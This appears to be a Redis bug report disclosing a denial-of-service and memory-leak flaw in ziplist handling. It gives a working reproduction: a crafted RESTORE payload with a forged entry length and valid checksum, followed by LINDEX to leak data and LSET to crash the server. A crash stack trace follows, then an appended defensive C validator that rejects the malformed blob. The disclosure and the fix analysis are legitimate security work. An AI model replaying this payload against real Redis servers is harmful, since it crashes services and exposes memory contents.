
denial of service (daemon crash) & data leak #7445

@0xPwny

Description

A denial of service (daemon crash) via a crafted RESTORE command that is mishandled by the __ziplistDelete function in ziplist.c.

The script below is used to change an element size and pass the crc64 check:
- https://gist.github.com/0xPwny/1824650b034106b643c30e22d0b133e5

Commands to trigger the crash:

FLUSHALL

LPUSH louza "AAAA"
LPUSH louza "BBBB"
LPUSH louza "CCCC"

FLUSHALL

RESTORE louza 0 "\x0e\x01\x1d\x1d\x00\x00\x00\x16\x00\x00\x00\x03\x00\x00\x04CCCC\x06\x04BBBB\x06\x3fAAAA\xff\t\x00\x88\xa5\xca\xa8\xc5A\xf45" // RESTORE with crafted data

LINDEX louza 2 // data leak

LSET louza 2 "BEEF"

=== REDIS BUG REPORT START: Cut & paste starting from here ===
22582:M 19 Jun 2020 18:29:20.000 # Redis 6.0.5 crashed by signal: 11
22582:M 19 Jun 2020 18:29:20.000 # Crashed running the instruction at: 0x7fe9ce61ee38
22582:M 19 Jun 2020 18:29:20.000 # Accessing address: 0x7fe9ce400000
22582:M 19 Jun 2020 18:29:20.001 # Failed assertion: (:0)

------ STACK TRACE ------
EIP:
/lib/x86_64-linux-gnu/libc.so.6(+0x15fe38)[0x7fe9ce61ee38]

Backtrace:
./redis-server *:6379(logStackTrace+0x45)[0x478fb5]
./redis-server *:6379(sigsegvHandler+0xb9)[0x479779]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x11390)[0x7fe9ce89a390]
/lib/x86_64-linux-gnu/libc.so.6(+0x15fe38)[0x7fe9ce61ee38]
./redis-server *:6379(__ziplistDelete+0x12c)[0x440b4c]
./redis-server *:6379(ziplistDelete+0x1d)[0x44143d]
./redis-server *:6379(quicklistReplaceAtIndex+0x44)[0x42caf4]
./redis-server *:6379(lsetCommand+0xd3)[0x45fb33]
./redis-server *:6379(call+0xab)[0x4350cb]
./redis-server *:6379(processCommand+0x43f)[0x43596f]
./redis-server *:6379(processCommandAndResetClient+0x10)[0x443660]
./redis-server *:6379(processInputBuffer+0xdd)[0x4479dd]
./redis-server *:6379(readQueryFromClient+0x232)[0x448022]
./redis-server *:6379[0x4c5613]
./redis-server *:6379(aeProcessEvents+0x2e6)[0x42e706]
./redis-server *:6379(aeMain+0x1d)[0x42ea8d]
./redis-server *:6379(main+0x4c5)[0x42b0c5]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fe9ce4df830]
./redis-server *:6379(_start+0x29)[0x42b389]
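Added illustration, not the reporter's script and not Redis code: a bounds-checking walk over the ziplist blob carried inside the RESTORE payload, of the kind a deserializer would run before trusting entry lengths. The 29-byte ziplist is taken from the payload above; its last entry's encoding byte 0x3f claims a 63-byte string while only "AAAA" follows, which is exactly what this check catches. The function name and the sample arrays are assumptions constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Bounds-checking walk over a ziplist blob (the structure inside RESTORE's quicklist
 * payload). Constructed illustration, not Redis code: the check that would reject the
 * crafted entry before __ziplistDelete trusts its claimed length. 1 = sane, 0 = reject. */
static uint32_t rd_le32(const unsigned char *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint32_t rd_be32(const unsigned char *p) { return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | (uint32_t)p[3]; }

int ziplist_is_sane(const unsigned char *zl, size_t len) {
    if (len < 11 || zl[len - 1] != 0xFF || rd_le32(zl) != len) return 0;  /* zlbytes, zlend */
    uint32_t zltail = rd_le32(zl + 4);
    uint16_t zllen  = (uint16_t)(zl[8] | zl[9] << 8);
    size_t end = len - 1, off = 10, prev_off = 10, count = 0;   /* end = offset of 0xFF */
    while (off < end) {
        size_t p = off, prevlen, datalen;
        /* prevlen: one byte, or 0xFE followed by a 4-byte little-endian length */
        if (zl[p] == 0xFE) { if (p + 5 > end) return 0; prevlen = rd_le32(zl + p + 1); p += 5; }
        else prevlen = zl[p++];
        if (count && prevlen != off - prev_off) return 0;   /* back pointer must match */
        if (p >= end) return 0;
        unsigned char enc = zl[p++];
        if ((enc & 0xC0) == 0x00) datalen = enc & 0x3F;                        /* 6-bit string */
        else if ((enc & 0xC0) == 0x40) {                                        /* 14-bit string */
            if (p + 1 > end) return 0; datalen = ((size_t)(enc & 0x3F) << 8) | zl[p]; p += 1; }
        else if ((enc & 0xC0) == 0x80) {                                        /* 32-bit string */
            if (p + 4 > end) return 0; datalen = rd_be32(zl + p); p += 4; }
        else if (enc == 0xC0) datalen = 2;                                      /* int16 */
        else if (enc == 0xD0) datalen = 4;                                      /* int32 */
        else if (enc == 0xE0) datalen = 8;                                      /* int64 */
        else if (enc == 0xF0) datalen = 3;                                      /* int24 */
        else if (enc == 0xFE) datalen = 1;                                      /* int8 */
        else if (enc >= 0xF1 && enc <= 0xFD) datalen = 0;                       /* immediate 0..12 */
        else return 0;                                                          /* invalid encoding */
        if (datalen > end - p) return 0;   /* claimed length runs past the blob (the 0x3f case) */
        prev_off = off; off = p + datalen; count++;
    }
    return off == end && zltail == prev_off && (zllen == 0xFFFF || count == zllen);
}

/* Constructed samples: the 29-byte ziplist inside the RESTORE payload above, whose last
 * entry claims 63 bytes (0x3f) but carries only "AAAA", and the same blob with the honest 0x04. */
const unsigned char CRAFTED_ZL[29] = { 0x1d,0,0,0, 0x16,0,0,0, 3,0,
    0x00,0x04,'C','C','C','C', 0x06,0x04,'B','B','B','B', 0x06,0x3f,'A','A','A','A', 0xff };
const unsigned char SANE_ZL[29] = { 0x1d,0,0,0, 0x16,0,0,0, 3,0,
    0x00,0x04,'C','C','C','C', 0x06,0x04,'B','B','B','B', 0x06,0x04,'A','A','A','A', 0xff };
```

Rejecting the blob at RESTORE time turns the later LINDEX/LSET crash path into a plain error reply, and the prevlen and zltail cross-checks also catch payloads whose individual lengths fit but whose back pointers do not.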
